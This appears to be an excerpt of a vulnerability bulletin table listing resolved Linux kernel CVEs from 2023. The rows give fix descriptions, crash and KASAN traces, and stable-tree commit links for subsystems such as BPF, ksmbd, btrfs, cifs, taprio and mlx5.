| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcuscale: Move rcu_scale_writer() schedule_timeout_uninterruptible() to _idle() The rcuscale.holdoff module parameter can be used to delay the start of rcu_scale_writer() kthread. However, the hung-task timeout will trigger when the timeout specified by rcuscale.holdoff is greater than hung_task_timeout_secs: runqemu kvm nographic slirp qemuparams="-smp 4 -m 2048M" bootparams="rcuscale.shutdown=0 rcuscale.holdoff=300" [ 247.071753] INFO: task rcu_scale_write:59 blocked for more than 122 seconds. [ 247.072529] Not tainted 6.4.0-rc1-00134-gb9ed6de8d4ff #7 [ 247.073400] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 247.074331] task:rcu_scale_write state:D stack:30144 pid:59 ppid:2 flags:0x00004000 [ 247.075346] Call Trace: [ 247.075660] <TASK> [ 247.075965] __schedule+0x635/0x1280 [ 247.076448] ? __pfx___schedule+0x10/0x10 [ 247.076967] ? schedule_timeout+0x2dc/0x4d0 [ 247.077471] ? __pfx_lock_release+0x10/0x10 [ 247.078018] ? enqueue_timer+0xe2/0x220 [ 247.078522] schedule+0x84/0x120 [ 247.078957] schedule_timeout+0x2e1/0x4d0 [ 247.079447] ? __pfx_schedule_timeout+0x10/0x10 [ 247.080032] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.080591] ? __pfx_process_timeout+0x10/0x10 [ 247.081163] ? __pfx_sched_set_fifo_low+0x10/0x10 [ 247.081760] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.082287] rcu_scale_writer+0x6b1/0x7f0 [ 247.082773] ? mark_held_locks+0x29/0xa0 [ 247.083252] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.083865] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.084412] kthread+0x179/0x1c0 [ 247.084759] ? __pfx_kthread+0x10/0x10 [ 247.085098] ret_from_fork+0x2c/0x50 [ 247.085433] </TASK> This commit therefore replaces schedule_timeout_uninterruptible() with schedule_timeout_idle(). | 2025-12-30 | not yet calculated | CVE-2023-54246 | https://git.kernel.org/stable/c/55887adc76e19aec9763186e2c1d0a3481d20e96 https://git.kernel.org/stable/c/4f03fba096bfded90e0d71eba8839a46922164d1 https://git.kernel.org/stable/c/83ed0cdb6ae0383dd14b02375c353773836884ed https://git.kernel.org/stable/c/9416dccb31fdb190d25d57e97674f232651f6560 https://git.kernel.org/stable/c/e60c122a1614b4f65b29a7bef9d83b9fd30e937a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Silence a warning in btf_type_id_size() syzbot reported a warning in [1] with the following stacktrace: WARNING: CPU: 0 PID: 5005 at kernel/bpf/btf.c:1988 btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988 ... RIP: 0010:btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988 ... Call Trace: <TASK> map_check_btf kernel/bpf/syscall.c:1024 [inline] map_create+0x1157/0x1860 kernel/bpf/syscall.c:1198 __sys_bpf+0x127f/0x5420 kernel/bpf/syscall.c:5040 __do_sys_bpf kernel/bpf/syscall.c:5162 [inline] __se_sys_bpf kernel/bpf/syscall.c:5160 [inline] __x64_sys_bpf+0x79/0xc0 kernel/bpf/syscall.c:5160 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd With the following btf [1] DECL_TAG 'a' type_id=4 component_idx=-1 [2] PTR '(anon)' type_id=0 [3] TYPE_TAG 'a' type_id=2 [4] VAR 'a' type_id=3, linkage=static and when the bpf_attr.btf_key_type_id = 1 (DECL_TAG), the following WARN_ON_ONCE in btf_type_id_size() is triggered: if (WARN_ON_ONCE(!btf_type_is_modifier(size_type) && !btf_type_is_var(size_type))) return NULL; Note that 'return NULL' is the correct behavior as we don't want a DECL_TAG type to be used as a btf_{key,value}_type_id even for the case like 'DECL_TAG -> STRUCT'. So there is no correctness issue here, we just want to silence warning. To silence the warning, I added DECL_TAG as one of kinds in btf_type_nosize() which will cause btf_type_id_size() returning NULL earlier without the warning. [1] https://lore.kernel.org/bpf/000000000000e0df8d05fc75ba86@google.com/ | 2025-12-30 | not yet calculated | CVE-2023-54247 | https://git.kernel.org/stable/c/61f4bd46a03a81865aca3bcbad2f7b7032fb3160 https://git.kernel.org/stable/c/7c4f5ab63e7962812505cbd38cc765168a223acb https://git.kernel.org/stable/c/e6c2f594ed961273479505b42040782820190305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add check for kmemdup Since kmemdup may return a NULL pointer, it is better to add a check for the return value in order to avoid a NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54248 | https://git.kernel.org/stable/c/952bbfcedbf895963509861e55a6e4fc105eb842 https://git.kernel.org/stable/c/7898db22ed6cee909513cf4935b5f9f0298b74f0 https://git.kernel.org/stable/c/9f36704a58adade3b0216f8a3fa5503db4517208 https://git.kernel.org/stable/c/cdcdfd57f4c701f832787da1309cc6687917d783 https://git.kernel.org/stable/c/e6c3cef24cb0d045f99d5cb039b344874e3cfd74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bus: mhi: ep: Only send -ENOTCONN status if client driver is available For the STOP and RESET commands, only send the channel disconnect status -ENOTCONN if client driver is available. Otherwise, it will result in null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54249 | https://git.kernel.org/stable/c/353aea15d6edbd4e69e039356a1bd3e641f7d952 https://git.kernel.org/stable/c/860ad591056d7e4dc30bc130b6ec6e6d70930c85 https://git.kernel.org/stable/c/e6cebcc27519dcf1652e604c73b9fd4f416987c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: avoid out of bounds access in decode_preauth_ctxt() Confirm that the accessed pneg_ctxt->HashAlgorithms address sits within the SMB request boundary; deassemble_neg_contexts() only checks that the eight byte smb2_neg_context header + (client controlled) DataLength are within the packet boundary, which is insufficient. Checking for sizeof(struct smb2_preauth_neg_context) is overkill given that the type currently assumes SMB311_SALT_SIZE bytes of trailing Salt. | 2025-12-30 | not yet calculated | CVE-2023-54250 | https://git.kernel.org/stable/c/39f5b4b313b445c980a2a295bed28228c29228ed https://git.kernel.org/stable/c/a2f6ded41bec1d3be643c80a5eb97f1680309001 https://git.kernel.org/stable/c/f02edb9debbd36f44efa7567031485892c7df60d https://git.kernel.org/stable/c/e7067a446264a7514fa1cfaa4052cdb6803bc6a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: taprio: Limit TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME to INT_MAX. syzkaller found zero division error [0] in div_s64_rem() called from get_cycle_time_elapsed(), where sched->cycle_time is the divisor. We have tests in parse_taprio_schedule() so that cycle_time will never be 0, and actually cycle_time is not 0 in get_cycle_time_elapsed(). The problem is that the types of divisor are different; cycle_time is s64, but the argument of div_s64_rem() is s32. syzkaller fed this input and 0x100000000 is cast to s32 to be 0. @TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME={0xc, 0x8, 0x100000000} We use s64 for cycle_time to cast it to ktime_t, so let's keep it and set max for cycle_time. While at it, we prevent overflow in setup_txtime() and add another test in parse_taprio_schedule() to check if cycle_time overflows. Also, we add a new tdc test case for this issue. [0]: divide error: 0000 [#1] PREEMPT SMP KASAN NOPTI CPU: 1 PID: 103 Comm: kworker/1:3 Not tainted 6.5.0-rc1-00330-g60cc1f7d0605 #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 Workqueue: ipv6_addrconf addrconf_dad_work RIP: 0010:div_s64_rem include/linux/math64.h:42 [inline] RIP: 0010:get_cycle_time_elapsed net/sched/sch_taprio.c:223 [inline] RIP: 0010:find_entry_to_transmit+0x252/0x7e0 net/sched/sch_taprio.c:344 Code: 3c 02 00 0f 85 5e 05 00 00 48 8b 4c 24 08 4d 8b bd 40 01 00 00 48 8b 7c 24 48 48 89 c8 4c 29 f8 48 63 f7 48 99 48 89 74 24 70 <48> f7 fe 48 29 d1 48 8d 04 0f 49 89 cc 48 89 44 24 20 49 8d 85 10 RSP: 0018:ffffc90000acf260 EFLAGS: 00010206 RAX: 177450e0347560cf RBX: 0000000000000000 RCX: 177450e0347560cf RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000100000000 RBP: 0000000000000056 R08: 0000000000000000 R09: ffffed10020a0934 R10: ffff8880105049a7 R11: ffff88806cf3a520 R12: ffff888010504800 R13: ffff88800c00d800 R14: ffff8880105049a0 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff88806cf00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f0edf84f0e8 CR3: 000000000d73c002 CR4: 0000000000770ee0 PKRU: 55555554 Call Trace: <TASK> get_packet_txtime net/sched/sch_taprio.c:508 [inline] taprio_enqueue_one+0x900/0xff0 net/sched/sch_taprio.c:577 taprio_enqueue+0x378/0xae0 net/sched/sch_taprio.c:658 dev_qdisc_enqueue+0x46/0x170 net/core/dev.c:3732 __dev_xmit_skb net/core/dev.c:3821 [inline] __dev_queue_xmit+0x1b2f/0x3000 net/core/dev.c:4169 dev_queue_xmit include/linux/netdevice.h:3088 [inline] neigh_resolve_output net/core/neighbour.c:1552 [inline] neigh_resolve_output+0x4a7/0x780 net/core/neighbour.c:1532 neigh_output include/net/neighbour.h:544 [inline] ip6_finish_output2+0x924/0x17d0 net/ipv6/ip6_output.c:135 __ip6_finish_output+0x620/0xaa0 net/ipv6/ip6_output.c:196 ip6_finish_output net/ipv6/ip6_output.c:207 [inline] NF_HOOK_COND include/linux/netfilter.h:292 [inline] ip6_output+0x206/0x410 net/ipv6/ip6_output.c:228 dst_output include/net/dst.h:458 [inline] NF_HOOK.constprop.0+0xea/0x260 include/linux/netfilter.h:303 ndisc_send_skb+0x872/0xe80 net/ipv6/ndisc.c:508 ndisc_send_ns+0xb5/0x130 net/ipv6/ndisc.c:666 addrconf_dad_work+0xc14/0x13f0 net/ipv6/addrconf.c:4175 process_one_work+0x92c/0x13a0 kernel/workqueue.c:2597 worker_thread+0x60f/0x1240 kernel/workqueue.c:2748 kthread+0x2fe/0x3f0 kernel/kthread.c:389 ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308 </TASK> Modules linked in: | 2025-12-30 | not yet calculated | CVE-2023-54251 | https://git.kernel.org/stable/c/f04f6d9b3b060f7e11219a65a76da65f1489e391 https://git.kernel.org/stable/c/0b45af982a4df0b14fb8669ee2a871cfdfa6a39c https://git.kernel.org/stable/c/57b3fe08ae06ef11af007b4a182629b12a961e30 https://git.kernel.org/stable/c/e739718444f7bf2fa3d70d101761ad83056ca628 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: think-lmi: Fix memory leaks when parsing ThinkStation WMI strings My previous commit introduced a memory leak where the item allocated from tlmi_setting was not freed. This commit also renames it to avoid confusion with the similarly named variable in the same function. | 2025-12-30 | not yet calculated | CVE-2023-54252 | https://git.kernel.org/stable/c/cccdb30935c82be805d3362a15680b95d5cb3ee0 https://git.kernel.org/stable/c/081da7b1c881828244b93b3befb7c18389f696bb https://git.kernel.org/stable/c/43fc0342bac1808fda2b76184e43414727111c6b https://git.kernel.org/stable/c/e7d796fccdc8d17c2d21817ebe4c7bf5bbfe5433 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: set page extent mapped after read_folio in relocate_one_page One of the CI runs triggered the following panic assertion failed: PagePrivate(page) && page->private, in fs/btrfs/subpage.c:229 ------------[ cut here ]------------ kernel BUG at fs/btrfs/subpage.c:229! Internal error: Oops - BUG: 00000000f2000800 [#1] SMP CPU: 0 PID: 923660 Comm: btrfs Not tainted 6.5.0-rc3+ #1 pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : btrfs_subpage_assert+0xbc/0xf0 lr : btrfs_subpage_assert+0xbc/0xf0 sp : ffff800093213720 x29: ffff800093213720 x28: ffff8000932138b4 x27: 000000000c280000 x26: 00000001b5d00000 x25: 000000000c281000 x24: 000000000c281fff x23: 0000000000001000 x22: 0000000000000000 x21: ffffff42b95bf880 x20: ffff42b9528e0000 x19: 0000000000001000 x18: ffffffffffffffff x17: 667274622f736620 x16: 6e69202c65746176 x15: 0000000000000028 x14: 0000000000000003 x13: 00000000002672d7 x12: 0000000000000000 x11: ffffcd3f0ccd9204 x10: ffffcd3f0554ae50 x9 : ffffcd3f0379528c x8 : ffff800093213428 x7 : 0000000000000000 x6 : ffffcd3f091771e8 x5 : ffff42b97f333948 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000000 x1 : ffff42b9556cde80 x0 : 000000000000004f Call trace: btrfs_subpage_assert+0xbc/0xf0 btrfs_subpage_set_dirty+0x38/0xa0 btrfs_page_set_dirty+0x58/0x88 relocate_one_page+0x204/0x5f0 relocate_file_extent_cluster+0x11c/0x180 relocate_data_extent+0xd0/0xf8 relocate_block_group+0x3d0/0x4e8 btrfs_relocate_block_group+0x2d8/0x490 btrfs_relocate_chunk+0x54/0x1a8 btrfs_balance+0x7f4/0x1150 btrfs_ioctl+0x10f0/0x20b8 __arm64_sys_ioctl+0x120/0x11d8 invoke_syscall.constprop.0+0x80/0xd8 do_el0_svc+0x6c/0x158 el0_svc+0x50/0x1b0 el0t_64_sync_handler+0x120/0x130 el0t_64_sync+0x194/0x198 Code: 91098021 b0007fa0 91346000 97e9c6d2 (d4210000) This is the same problem outlined in 17b17fcd6d44 ("btrfs: set_page_extent_mapped after read_folio in btrfs_cont_expand"), and the fix is the same. I originally looked for the same pattern elsewhere in our code, but mistakenly skipped over this code because I saw the page cache readahead before we set_page_extent_mapped, not realizing that this was only in the !page case, that we can still end up with a !uptodate page and then do the btrfs_read_folio further down. The fix here is the same as the above mentioned patch, move the set_page_extent_mapped call to after the btrfs_read_folio() block to make sure that we have the subpage blocksize stuff setup properly before using the page. | 2025-12-30 | not yet calculated | CVE-2023-54253 | https://git.kernel.org/stable/c/08daa38ca212d87f77beae839bc9be71079c7abf https://git.kernel.org/stable/c/9d1e020ed9649cf140fcfafd052cfdcce9e9d67d https://git.kernel.org/stable/c/e7f1326cc24e22b38afc3acd328480a1183f9e79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/ttm: Don't leak a resource on eviction error On eviction errors other than -EMULTIHOP we were leaking a resource. Fix. v2: - Avoid yet another goto (Andi Shyti) | 2025-12-30 | not yet calculated | CVE-2023-54254 | https://git.kernel.org/stable/c/7738335d73d0686ec8995e0448e5d1b48cffb2a4 https://git.kernel.org/stable/c/e9c44738cb1f537b177cc1beabcf6913690460cd https://git.kernel.org/stable/c/6aea0032380bbb1efebd598ad733d16925167921 https://git.kernel.org/stable/c/e8188c461ee015ba0b9ab2fc82dbd5ebca5a5532 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sh: dma: Fix DMA channel offset calculation Various SoCs of the SH3, SH4 and SH4A family, which use this driver, feature a differing number of DMA channels, which can be distributed between up to two DMAC modules. The existing implementation fails to correctly accommodate all those variations, resulting in wrong channel offset calculations and leading to kernel panics. Rewrite dma_base_addr() in order to properly calculate channel offsets in a DMAC module. Fix dmaor_read_reg() and dmaor_write_reg(), so that the correct DMAC module base is selected for the DMAOR register. | 2025-12-30 | not yet calculated | CVE-2023-54255 | https://git.kernel.org/stable/c/bca700b48c72f4ffeee977a2ed0eb4a6b4b7b8ad https://git.kernel.org/stable/c/479380acfa63247b5ac62476138f847aefc62692 https://git.kernel.org/stable/c/4989627157735c1f1619f08e5bc1592418e7c878 https://git.kernel.org/stable/c/d1c946552af299f4fa85bf7da15e328123771128 https://git.kernel.org/stable/c/196f6c71905aa384c0177acf194a1144d480333b https://git.kernel.org/stable/c/8fb11fa4805699c6b73a9c8a9d45807f9874abe3 https://git.kernel.org/stable/c/e9e33faea104381bac80ac79328f0540fc2969f2 https://git.kernel.org/stable/c/e82e47584847129a20b8c9f4a1dcde09374fb0e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: macb: fix a memory corruption in extended buffer descriptor mode For quite some time we were chasing a bug which looked like a sudden permanent failure of networking and mmc on some of our devices. The bug was very sensitive to any software changes and even more to any kernel debug options. Finally we got a setup where the problem was reproducible with CONFIG_DMA_API_DEBUG=y and it revealed the issue with the rx dma: [ 16.992082] ------------[ cut here ]------------ [ 16.996779] DMA-API: macb ff0b0000.ethernet: device driver tries to free DMA memory it has not allocated [device address=0x0000000875e3e244] [size=1536 bytes] [ 17.011049] WARNING: CPU: 0 PID: 85 at kernel/dma/debug.c:1011 check_unmap+0x6a0/0x900 [ 17.018977] Modules linked in: xxxxx [ 17.038823] CPU: 0 PID: 85 Comm: irq/55-8000f000 Not tainted 5.4.0 #28 [ 17.045345] Hardware name: xxxxx [ 17.049528] pstate: 60000005 (nZCv daif -PAN -UAO) [ 17.054322] pc : check_unmap+0x6a0/0x900 [ 17.058243] lr : check_unmap+0x6a0/0x900 [ 17.062163] sp : ffffffc010003c40 [ 17.065470] x29: ffffffc010003c40 x28: 000000004000c03c [ 17.070783] x27: ffffffc010da7048 x26: ffffff8878e38800 [ 17.076095] x25: ffffff8879d22810 x24: ffffffc010003cc8 [ 17.081407] x23: 0000000000000000 x22: ffffffc010a08750 [ 17.086719] x21: ffffff8878e3c7c0 x20: ffffffc010acb000 [ 17.092032] x19: 0000000875e3e244 x18: 0000000000000010 [ 17.097343] x17: 0000000000000000 x16: 0000000000000000 [ 17.102647] x15: ffffff8879e4a988 x14: 0720072007200720 [ 17.107959] x13: 0720072007200720 x12: 0720072007200720 [ 17.113261] x11: 0720072007200720 x10: 0720072007200720 [ 17.118565] x9 : 0720072007200720 x8 : 000000000000022d [ 17.123869] x7 : 0000000000000015 x6 : 0000000000000098 [ 17.129173] x5 : 0000000000000000 x4 : 0000000000000000 [ 17.134475] x3 : 00000000ffffffff x2 : ffffffc010a1d370 [ 17.139778] x1 : b420c9d75d27bb00 x0 : 0000000000000000 [ 17.145082] Call trace: [ 17.147524] check_unmap+0x6a0/0x900 [ 17.151091] debug_dma_unmap_page+0x88/0x90 [ 17.155266] gem_rx+0x114/0x2f0 [ 17.158396] macb_poll+0x58/0x100 [ 17.161705] net_rx_action+0x118/0x400 [ 17.165445] __do_softirq+0x138/0x36c [ 17.169100] irq_exit+0x98/0xc0 [ 17.172234] __handle_domain_irq+0x64/0xc0 [ 17.176320] gic_handle_irq+0x5c/0xc0 [ 17.179974] el1_irq+0xb8/0x140 [ 17.183109] xiic_process+0x5c/0xe30 [ 17.186677] irq_thread_fn+0x28/0x90 [ 17.190244] irq_thread+0x208/0x2a0 [ 17.193724] kthread+0x130/0x140 [ 17.196945] ret_from_fork+0x10/0x20 [ 17.200510] ---[ end trace 7240980785f81d6f ]--- [ 237.021490] ------------[ cut here ]------------ [ 237.026129] DMA-API: exceeded 7 overlapping mappings of cacheline 0x0000000021d79e7b [ 237.033886] WARNING: CPU: 0 PID: 0 at kernel/dma/debug.c:499 add_dma_entry+0x214/0x240 [ 237.041802] Modules linked in: xxxxx [ 237.061637] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G W 5.4.0 #28 [ 237.068941] Hardware name: xxxxx [ 237.073116] pstate: 80000085 (Nzcv daIf -PAN -UAO) [ 237.077900] pc : add_dma_entry+0x214/0x240 [ 237.081986] lr : add_dma_entry+0x214/0x240 [ 237.086072] sp : ffffffc010003c30 [ 237.089379] x29: ffffffc010003c30 x28: ffffff8878a0be00 [ 237.094683] x27: 0000000000000180 x26: ffffff8878e387c0 [ 237.099987] x25: 0000000000000002 x24: 0000000000000000 [ 237.105290] x23: 000000000000003b x22: ffffffc010a0fa00 [ 237.110594] x21: 0000000021d79e7b x20: ffffffc010abe600 [ 237.115897] x19: 00000000ffffffef x18: 0000000000000010 [ 237.121201] x17: 0000000000000000 x16: 0000000000000000 [ 237.126504] x15: ffffffc010a0fdc8 x14: 0720072007200720 [ 237.131807] x13: 0720072007200720 x12: 0720072007200720 [ 237.137111] x11: 0720072007200720 x10: 0720072007200720 [ 237.142415] x9 : 0720072007200720 x8 : 0000000000000259 [ 237.147718] x7 : 0000000000000001 x6 : 0000000000000000 [ 237.15302 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54257 | https://git.kernel.org/stable/c/dd7a49a3eaf723a01b2fdf153f98450a82b0b0fe https://git.kernel.org/stable/c/82e626af24683e01211abe66cec27a387f8f17c9 https://git.kernel.org/stable/c/7169d1638824c4bf7e0fe0baad381ddec861fa70 https://git.kernel.org/stable/c/1bec9da233f779e7b6954ee07ad7e6d8f2a4dd83 https://git.kernel.org/stable/c/7ccc58a1a75601c936069d4a0741940623990ade https://git.kernel.org/stable/c/9412a9bf5952cdf5d0f736cc1e8c68fd366c2d47 https://git.kernel.org/stable/c/5dcf3a6843d0d7cc76960fbe8511d425f217744c https://git.kernel.org/stable/c/e8b74453555872851bdd7ea43a7c0ec39659834f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix potential oops in cifs_oplock_break With deferred close we can have closes that race with lease breaks, and so with the current checks for whether to send the lease response, oplock_response(), this can mean that an unmount (kill_sb) can occur just before we were checking if the tcon->ses is valid. See below: [Fri Aug 4 04:12:50 2023] RIP: 0010:cifs_oplock_break+0x1f7/0x5b0 [cifs] [Fri Aug 4 04:12:50 2023] Code: 7d a8 48 8b 7d c0 c0 e9 02 48 89 45 b8 41 89 cf e8 3e f5 ff ff 4c 89 f7 41 83 e7 01 e8 82 b3 03 f2 49 8b 45 50 48 85 c0 74 5e <48> 83 78 60 00 74 57 45 84 ff 75 52 48 8b 43 98 48 83 eb 68 48 39 [Fri Aug 4 04:12:50 2023] RSP: 0018:ffffb30607ddbdf8 EFLAGS: 00010206 [Fri Aug 4 04:12:50 2023] RAX: 632d223d32612022 RBX: ffff97136944b1e0 RCX: 0000000080100009 [Fri Aug 4 04:12:50 2023] RDX: 0000000000000001 RSI: 0000000080100009 RDI: ffff97136944b188 [Fri Aug 4 04:12:50 2023] RBP: ffffb30607ddbe58 R08: 0000000000000001 R09: ffffffffc08e0900 [Fri Aug 4 04:12:50 2023] R10: 0000000000000001 R11: 000000000000000f R12: ffff97136944b138 [Fri Aug 4 04:12:50 2023] R13: ffff97149147c000 R14: ffff97136944b188 R15: 0000000000000000 [Fri Aug 4 04:12:50 2023] FS: 0000000000000000(0000) GS:ffff9714f7c00000(0000) knlGS:0000000000000000 [Fri Aug 4 04:12:50 2023] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [Fri Aug 4 04:12:50 2023] CR2: 00007fd8de9c7590 CR3: 000000011228e000 CR4: 0000000000350ef0 [Fri Aug 4 04:12:50 2023] Call Trace: [Fri Aug 4 04:12:50 2023] <TASK> [Fri Aug 4 04:12:50 2023] process_one_work+0x225/0x3d0 [Fri Aug 4 04:12:50 2023] worker_thread+0x4d/0x3e0 [Fri Aug 4 04:12:50 2023] ? process_one_work+0x3d0/0x3d0 [Fri Aug 4 04:12:50 2023] kthread+0x12a/0x150 [Fri Aug 4 04:12:50 2023] ? set_kthread_struct+0x50/0x50 [Fri Aug 4 04:12:50 2023] ret_from_fork+0x22/0x30 [Fri Aug 4 04:12:50 2023] </TASK> To fix this change the ordering of the checks before sending the oplock_response to first check if the openFileList is empty. | 2025-12-30 | not yet calculated | CVE-2023-54258 | https://git.kernel.org/stable/c/b99f490ea87ebcca3a429fd8837067feb56a4c7c https://git.kernel.org/stable/c/5ee28bcfbaacf289eb25c662a2862542ea6ce6a7 https://git.kernel.org/stable/c/6b67a6d2e50634fe127e656147c81915955e9f5e https://git.kernel.org/stable/c/e8f5f849ffce24490eb9449e98312b66c0dba76f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soundwire: bus: Fix unbalanced pm_runtime_put() causing usage count underflow This reverts commit 443a98e649b4 ("soundwire: bus: use pm_runtime_resume_and_get()") Change calls to pm_runtime_resume_and_get() back to pm_runtime_get_sync(). This fixes a usage count underrun caused by doing a pm_runtime_put() even though pm_runtime_resume_and_get() returned an error. The three affected functions ignore -EACCES error from trying to get pm_runtime, and carry on, including a put at the end of the function. But pm_runtime_resume_and_get() does not increment the usage count if it returns an error. So in the -EACCES case you must not call pm_runtime_put(). The documentation for pm_runtime_get_sync() says: "Consider using pm_runtime_resume_and_get() ... as this is likely to result in cleaner code." In this case I don't think it results in cleaner code because the pm_runtime_put() at the end of the function would have to be conditional on the return value from pm_runtime_resume_and_get() at the top of the function. pm_runtime_get_sync() doesn't have this problem because it always increments the count, so always needs a put. The code can just flow through and do the pm_runtime_put() unconditionally. | 2025-12-30 | not yet calculated | CVE-2023-54259 | https://git.kernel.org/stable/c/4e5e9da139c007dfc397a159093b4c4187ee67fa https://git.kernel.org/stable/c/203aa4374c433159f163acde2d0bd4118f23bbaf https://git.kernel.org/stable/c/e9537962519e88969f5f69cd0571eb4f6984403c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix lost destroy smbd connection when MR allocate failed If the MR allocation failed, the smb direct connection info is NULL, so smbd_destroy() will directly return and the connection info will be leaked. Let's set the smb direct connection info to the server before calling smbd_destroy(). | 2025-12-30 | not yet calculated | CVE-2023-54260 | https://git.kernel.org/stable/c/d303e25887127364a6765eaf7ac68aa2bac518a9 https://git.kernel.org/stable/c/324c0c34fff1affd436e509325cb46739209704e https://git.kernel.org/stable/c/caac205e0d5b44c4c23a10c6c0976d50ebe16ac2 https://git.kernel.org/stable/c/46cd6c639cddba2bd2d810ceb16bb20374ad75b0 https://git.kernel.org/stable/c/c51ae01104b318bf15f3c5097faba5c72addba7a https://git.kernel.org/stable/c/04b7e13b8a13264282f874db5378fc3d3253cfac https://git.kernel.org/stable/c/e9d3401d95d62a9531082cd2453ed42f2740e3fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Add missing gfx11 MQD manager callbacks mqd_stride function was introduced in commit 2f77b9a242a2 ("drm/amdkfd: Update MQD management on multi XCC setup") but not assigned for gfx11. Fixes a NULL dereference in debugfs. | 2025-12-30 | not yet calculated | CVE-2023-54261 | https://git.kernel.org/stable/c/399b73d6b7720a9eae68a333193b53ed4f432fe5 https://git.kernel.org/stable/c/e9dca969b2426702a73719ab9207e43c6d80b581 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Don't clone flow post action attributes second time The code already clones post action attributes in mlx5e_clone_flow_attr_for_post_act(). Creating another copy in mlx5e_tc_post_act_add() is an erroneous leftover from the original implementation. Instead, assign handle->attribute to post_attr provided by the caller. Note that cloning the attribute a second time is not just wasteful but also causes issues like the second copy not being properly updated in neigh update code, which leads to the following use-after-free: Feb 21 09:02:00 c-237-177-40-045 kernel: BUG: KASAN: use-after-free in mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_report+0xbb/0x1a0 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_stack+0x1e/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_set_track+0x21/0x30 Feb 21 09:02:00 c-237-177-40-045 kernel: __kasan_kmalloc+0x7a/0x90 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_stack+0x1e/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_set_track+0x21/0x30 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_free_info+0x2a/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: ____kasan_slab_free+0x11a/0x1b0 Feb 21 09:02:00 c-237-177-40-045 kernel: page dumped because: kasan: bad access detected Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_core 0000:08:00.0: mlx5_cmd_out_err:803:(pid 8833): SET_FLOW_TABLE_ENTRY(0x936) op_mod(0x0) failed, status bad resource state(0x9), syndrome (0xf2ff71), err(-22) Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_core 0000:08:00.0 enp8s0f0: Failed to add post action rule Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_core 0000:08:00.0: mlx5e_tc_encap_flows_add:190:(pid 8833): Failed to update flow post acts, -22 Feb 21 09:02:00 c-237-177-40-045 kernel: Call Trace: Feb 21 09:02:00 c-237-177-40-045 kernel: <TASK> Feb 21 09:02:00 c-237-177-40-045 kernel: dump_stack_lvl+0x57/0x7d Feb 21 09:02:00 c-237-177-40-045 kernel: print_report+0x170/0x471 Feb 21 09:02:00 c-237-177-40-045 kernel: ? mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_report+0xbb/0x1a0 Feb 21 09:02:00 c-237-177-40-045 kernel: ? mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: ? __module_address.part.0+0x62/0x200 Feb 21 09:02:00 c-237-177-40-045 kernel: ? mlx5_cmd_stub_create_flow_table+0xd0/0xd0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: ? __raw_spin_lock_init+0x3b/0x110 Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_cmd_create_fte+0x80/0xb0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: add_rule_fg+0xe80/0x19c0 [mlx5_core] -- Feb 21 09:02:00 c-237-177-40-045 kernel: Allocated by task 13476: Feb 21 09:02:00 c-237-177-40-045 kernel: 